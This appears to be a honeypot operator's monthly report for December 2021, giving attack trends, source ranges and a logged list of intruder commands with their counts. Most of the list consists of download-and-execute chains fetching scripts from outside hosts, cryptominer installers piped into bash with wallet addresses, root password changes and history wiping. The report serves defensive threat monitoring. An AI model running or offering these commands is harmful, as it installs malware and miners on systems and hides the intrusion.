December 2021

This month the honeypot was active until 26th after that the honeypot crashed and has now been started.

Between 8-12-2021 to 26-12-2021 we saw a steady trend until 24-12-21 when there was a sharp increase by 100% to just over 40,000 attacks

We are still continuing seeing America dominating in attacks against our honeypot. We are seeing ranges of 8.21.11.xx and 8.37.43.xx. Both these ranges are owned by cloudflare which shows you that cloudflare doesnt just protect end users it also allows malicious actors to cloak their servers.

We continue to see the top username being root:admin being used to access the server

We continue seeing 96.43.128.70 being the main target, This IP has been the top IP that was attacked for the last three months, visiting http://96.43.128.70/ we get file not found. Looking at the the requests we see they all are targeting /multi/check.php and /multi/checkref.php, These urls do not exist or cant be accessed by the browser.

Looking at the commands being ran we see the same type of commands being ran over the past few months. With being the top CMD: echo -e “\x6F\x6B”. We continue see a rise of mining bot attacks where majority of commands attempted to be ran is related to a mining bot.

CMD: echo -e “\x6F\x6B”513
CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://tigan.cf/sh; curl -O http://tigan.cf/sh; chmod 777 sh; sh sh; tftp tigan.cf -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g tigan.cf; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *129
CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://greektaverna.tk/sh; curl -O http://greektaverna.tk/sh; chmod 777 sh; sh sh; tftp greektaverna.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g greektaverna.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *101
CMD: curl: option -L not recognized curl: try ‘curl –help’ or ‘curl –manual’ for more information85
CMD: uname -a;lspci | grep -i –color ‘vga\|3d\|2d’;curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr85
CMD: pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; apt install dos2unix -y; yum install dos2unix -y; curl -O http://141.98.10.246/storytime/a; chmod 777 a; dos2unix a; ./a; rm -rf a; history -c; pkill Xorg; pkill cnrig; pkill x86_64; pkill x86; pkill java; pkill python; pkill screen72
CMD: rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 nigga; rm x86_6463
CMD: curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44XKLDbSztdXqao2Rs2EFFLvdjsbRwYrP1FkqdqB91v1PohHdSSTjyeKQ4t6UMFXNdYpxkNhwpi9xTRmEsk6PeUSLHCfeLR57
CMD: sudo hive-passwd `hostname`; echo `hostname`; pkill Xorg; pkill x11vnc; pkill Hello; systemctl stop shellinabox; history -c56
CMD: echo root:12wsafdsf4rwr234r32w|chpasswd|bash; uname -a; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 42yvmZB43FH6d9pccfUvBo9Kne6QCP9RhepyjGeqoYeh2zF4XXrVDFi4fGydEUyFPhJEZWhp22LuCWSYEPeeKQp6PXwwW3G44
CMD: uname -s -v -n -r -m44
CMD: cd /tmp || cd /run || cd /; wget http://23.95.222.119/obins.sh; chmod 777 obins.sh; sh obins.sh; tftp 23.95.222.119 -c get otftp1.sh; chmod 777 otftp1.sh; sh otftp1.sh; tftp -r otftp2.sh -g 23.95.222.119; chmod 777 otftp2.sh; sh otftp2.sh; rm -rf obins.sh otftp1.sh otftp2.sh; rm -rf *42
CMD: perl /var/tmp/clamav.pl;rm -rf /var/tmp/clamav.pl40
CMD: scp -t /var/tmp/clamav.pl38
CMD: uname -a35
CMD: curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ33
CMD: curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 42yvmZB43FH6d9pccfUvBo9Kne6QCP9RhepyjGeqoYeh2zF4XXrVDFi4fGydEUyFPhJEZWhp22LuCWSYEPeeKQp6PXwwW3G30
CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://sekinarh.tk/sh; curl -O http://sekinarh.tk/sh; chmod 777 sh; sh sh; tftp sekinarh.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g sekinarh.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 sekinarh.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *28
CMD: cat /etc/issue26
CMD: wget https://www.nasapaul.com/ninfo; curl -O https://www.nasapaul.com/ninfo; chmod 777 *; ./ninfo2